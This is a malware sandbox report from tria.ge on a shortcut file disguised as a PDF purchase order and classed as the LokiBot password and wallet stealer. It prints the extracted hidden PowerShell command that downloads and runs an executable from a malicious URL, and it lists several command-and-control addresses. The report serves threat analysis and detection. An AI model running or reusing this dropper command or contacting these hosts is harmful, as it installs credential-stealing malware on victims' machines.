Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

ORDENDECOMPRA.pdf.lnk

windows7-x64

10

ORDENDECOMPRA.pdf.lnk

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    ORDENDECOMPRA.pdf.lnk

  • Size

    2KB

  • Sample

    241127-wy1m2avkbw

  • MD5

    3efc7482d963e194a7524ea6918c0912

  • SHA1

    d24544bc9eca9b444aa471409f6f60c49e8ca88b

  • SHA256

    6ad3893d400a4e64de9042bd306b8d346e89f2966d417ee431ceb635e7e608b3

  • SHA512

    6b41f1efa74f1655b60ca1bbd4e5831c1e6f314aa87f5af86ab3818f4dde9d551bab95ed58b7f267da8accc9cede878ea1b147345c0ee9111368e8f34364bcf7

Score
10/10
lokibotcollectiondiscoveryexecutionspywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
1
Hiddden -Command dssec.dat;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/osingkjbxfd/agerfwearfwerfdfhsrarytrswerthdyttyfuiuoifjcghhbg/gefghdhjsdxghshnytrghdhfghsgbuhihtrgeyt/sdhtfjysdfhdyujujtryh3rthyer/gvndxfghs.exe','cisencb.exe');./'cisencb.exe';(get-item 'cisencb.exe').Attributes += 'Hidden';
URLs
exe.dropper

https://www.sodiumlaurethsulfatedesyroyer.com/osingkjbxfd/agerfwearfwerfdfhsrarytrswerthdyttyfuiuoifjcghhbg/gefghdhjsdxghshnytrghdhfghsgbuhihtrgeyt/sdhtfjysdfhdyujujtryh3rthyer/gvndxfghs.exe

Extracted

Family

lokibot

C2

http://45.149.241.168/fujfygidj/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

http://naturealmikaly.sytes.net:4409/aujfygidj/five/fre.php

Targets

    • Target

      ORDENDECOMPRA.pdf.lnk

    • Size

      2KB

    • MD5

      3efc7482d963e194a7524ea6918c0912

    • SHA1

      d24544bc9eca9b444aa471409f6f60c49e8ca88b

    • SHA256

      6ad3893d400a4e64de9042bd306b8d346e89f2966d417ee431ceb635e7e608b3

    • SHA512

      6b41f1efa74f1655b60ca1bbd4e5831c1e6f314aa87f5af86ab3818f4dde9d551bab95ed58b7f267da8accc9cede878ea1b147345c0ee9111368e8f34364bcf7

    Score
    10/10
    lokibotcollectiondiscoveryexecutionspywarestealertrojan

    • Lokibot

      Lokibot is a Password and CryptoCoin Wallet Stealer.

      trojanspywarestealerlokibot

    • Lokibot family

      lokibot

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

      execution

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Accesses Microsoft Outlook profiles

      collection

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.